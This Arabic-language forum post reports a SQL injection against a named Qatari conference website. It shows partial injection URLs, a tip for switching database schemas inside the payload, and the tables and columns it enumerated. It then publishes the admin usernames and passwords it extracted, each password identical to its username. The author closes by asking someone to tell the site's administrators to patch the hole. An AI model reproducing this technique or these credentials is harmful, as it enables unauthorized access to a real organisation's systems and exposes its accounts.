تم حقن الموقع وهذه هي النتائج
لاحظت وجود اكثر من سيجما حالوت ان اجرب عدد منهم وهذه هي النتائج
الجداول التي تحتوي على باس ةورد(لاحظ السيجما)
http://www.qatar-conferences.org/ara...115,%2037%29--
admin_login:password:qatarcon_ararabsummit
admin_login:password:qatarcon_arcomoros
admin_login:password:qatarcon_ardarfur
admin_login:password:qatarcon_ardarfur2
admin_login:password:qatarcon_ardemo10
admin_login:password:qatarcon_ardevelopment
admin_login:password:qatarcon_ardialogue09
admin_login:password:qatarcon_ardialogue10
admin_logi
حقنة استخراج العواميد الموجودة فن الجدول admin_login
http://www.qatar-conferences.org/ara...5f6c6f67696e--
نتيجة الحقنة
admin_login:id:qatarcon_ararabsummit
admin_login:username:qatarcon_ararabsummit
admin_login:password:qatarcon_ararabsummit
admin_login:id:qatarcon_arcomoros
admin_login:username:qatarcon_arcomoros
admin_login:password:qatarcon_arcomoros
admin_login:id:qatarcon_ardarfur
admin_login:username:qatarcon_ardarfur
admin_login:password:qatarcon_ar
لاحظ اختلاف السيجما واستخراج الاعمدة من عدة جداول بنفس الاسم من سيجما مختلفة
حقنة استخراج بيانتا الادمن
http://www.qatar-conferences.org/ara...+admin_login--
يمكنك التنقل في السيجما من خلال وضع اسم السيجما في الاستغلال قبل admin_login مسبوقا بـ .
from+admin_login => from+qatarcon_ararabsummit.admin_login
معلومات الادمن (اليوزر بعده الباس)
________________
p4362721
p4362721
________________
dibarab
dibarab
________________
dibarabdemocracy
dibarabdemocracy
________________
p5818834
p5818834
________________
dibdemocracy08
dibdemocracy08
________________
p5818834
p5818834
________________
dibdialogue08
dibdialogue08
لن اضع الحقن التي استخرجت بها المعلومات لاني شرحت الطريقة فوق بل انتم قوموا بذلك للتعلم فقط
يا شباب انا بنصحكم ان لا تبحثوا عن لوحة التحكم
لانه موقع عربي (قطر)
اصلا انا بتوقع ان ما في لوحة تحكم لاني لاحظت ان هذا الموقع كأنه مرتبط مع مواقع حكومية قطرية اخرى
يمكن تكون لوحة تحكم وحدة لهذه المواقع
الغريب ان اسم المستخدم نفسة كلمة السر !!
ارجو من الاخ ماستر مراسلة ادارة الموقع لترقيع الثغرة